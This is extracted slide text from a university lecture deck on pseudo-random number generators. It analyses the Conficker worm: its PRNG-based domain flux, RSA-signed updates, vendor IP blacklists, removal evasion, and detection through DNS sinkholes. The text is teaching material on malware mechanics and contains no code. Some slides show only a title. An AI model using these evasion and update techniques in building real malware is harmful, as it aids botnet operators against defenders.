NetpwCanonicalize hook First of all: no other botnets should be able to infect this computer Conficker: if \..\ is found, then the shellcode is checked. Can decide if the exploit is coming from another conficker instance If a special http://.. string is found in the data, conficker tries to use this to update itself. The behavior of the function is slightly modified ->ability to detect the bot Update checking: if RSA signature does not exist -> no update (SHA-1, 1024 bit RSA -> latest Conficker 4096 bit RSA + unknown hash) SHA-1 is from OpenSSL library Pseudo-random number generators (PRNG) 89
Upgrade mechanism Domain flux: For the update, conficker A/B generates 250-250 random domain names, daily. Antivirus companies tried to preregister them Conficker.C uses 50.000 domain names, daily The PRNG is seeded by the current time Time synchronization: downloads web pages (google, yahoo, ) and uses the time data (day, month, year) in the HTTP response Pseudo-random number generators (PRNG) 90
Conficker domain generation algorithm Pseudo-random number generators (PRNG) 91
Conficker upgrade The generated domain name is checked for updates Updates are protected with RSA signatures public key is in the bot itself 1024 bit long in Conficker.A, 4096 bits for the other variants The public key is a good signature to search for (bot identification) Pseudo-random number generators (PRNG) 92
Conficker blacklists Conficker uses blacklist of network addresses (IP numbers) to avoid identification And to avoid scanning low-yield networks (expecting that most of the computers are patched here) E.g. IP addresses of the following companies are included: Kaspersky Trend Micro Symantec McAfee F-Secure Avira Bitdefender Microsoft Corp. Microsoft Education Microsoft License Microsoft Visual Studios Pseudo-random number generators (PRNG) 93
Removal of Conficker Conficker detects removal tools and tries to avoid removal Conficker code is packed (polymorphic) on the network or in the file system However, on the target computer the code is unpacked while running Easier to detect running processes The code is stored under random file names not fully random (depends on the variant) Special flags and security settings on the file are used Every instance should be removed to avoid re-infection A trick: Conficker uses OS mutexes to avoid running multiple instances. The mutex generation is based on CRC. Might be used to avoid reinfections. Pseudo-random number generators (PRNG) 94
Hidden Conficker file Pseudo-random number generators (PRNG) 95
How to identify bots in Conficker DNS sinkhole antivirus countermeasure Update DNS names used by conficker (getting queries from infected computers): although cannot inject any code into the botnet as RSA signature might fail, the querying computer can be identified. Scanning on infected computers (removal tools) problematic Using the P2P approach of conficker Pseudo-random number generators (PRNG) 96
Conficker.C http://mtc.sri.com/conficker/addendumc/ Pseudo-random number generators (PRNG) 97